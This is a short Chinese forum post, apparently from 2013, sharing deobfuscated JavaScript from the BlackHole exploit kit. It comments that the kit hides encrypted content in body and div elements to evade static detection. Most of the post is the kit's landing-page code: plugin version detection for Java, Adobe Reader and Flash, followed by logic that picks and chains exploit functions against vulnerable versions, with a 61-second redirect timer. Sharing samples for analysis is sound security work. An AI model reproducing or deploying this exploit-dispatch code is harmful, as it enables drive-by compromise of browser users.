和刚才那个一样
BlackHole
比较猥琐的是吧加密内容防到了body 和div元素里。。借此躲避某些静态检测- pdpd={version:"0.7.9",name:"pdpd",handler:function(c,b,a){return function(){c(b,a)}},openTag:"<",isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}return 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c)){c=4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$hasMimeType:function(a){return function(c){if(!a.isIE&&c){var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);for(b=0;b<d.length;b++){if(a.isString(d[b])&&/[^\s]/.test(d[b])){f=navigator.mimeTypes[d[b]];e=f?f.enabledPlugin:0;if(e&&(e.name||e.description)){return f}}}...ction p3(){return false;}function f1(){return false;}function ff2(){return false;}document.write('');setTimeout(end_redirect,61000);var pdfver=[];function svwrbew6436b($){var ar = [];var javax = ($.getVersion("Ja"+"va")+".").toString()["split"](".");if ($.isMinVersion("Ja"+"va")>=0&&((javax[0]==1&&javax[1]==7&&javax[3]<9))){ar["push"](j2);} else if($.isMinVersion("Ja"+"va")>=0&&((javax[0]==1&&javax[1]==6&&javax[3]<33)||(javax[0]==1&&javax[1]<6))){ar["push"](j1);}pdfver=pdpd.getVersion("AdobeReader");if(window.document)if(typeof pdfver=="string"){pdfver=pdfver["split"](".")}else{pdfver=[0,0,0,0]}if(pdfver[0]>0&&pdfver[0]<8){if(window.document)ar["push"](p1);}if (((pdfver[0]==9)&&(pdfver[1]>=3))||((pdfver[0]==10)&&(pdfver[1]<103))) {ar["push"](p3);} else {if(window.document&&(pdfver[0]==8||(pdfver[0]==9&&pdfver[1]<4))){ar["push"](p2);}}var ver = ($.getVersion("Flash")+".").toString()["split"](".");if (((ver[0]==10&&ver[1]==0&&ver[2]>40)||(window.document&&(ver[0]==10&&ver[1]>0)&&(ver[0]==10&&ver[1]<2)))||window.document&&((ver[0]==10&&ver[1]==2&&ver[2]<159)||(ver[0]==10&&ver[1]<2))){ar["push"](ff2);}if((ver[0]==10&&ver[1]==3&&ver[2]==181&&ver[3]<=23)||(ver[0]==10&&ver[1]==3&&ver[2]<181)){ar["push"](f1);}var arcalli=0;var arcall = function(){if(ar.length<=arcalli)return 123;ss=setTimeout;var res=ar[arcalli]();arcalli++;if(res&&window.document){ss(function(){arcall()},5509);}else{arcall();}};arcall();}$["onDetec"+"tionDone"]("Ja"+"va", svwrbew6436b, "../six/getJavaInfo.jar");
|
发表于 2013-4-24 23:54:50
楼主
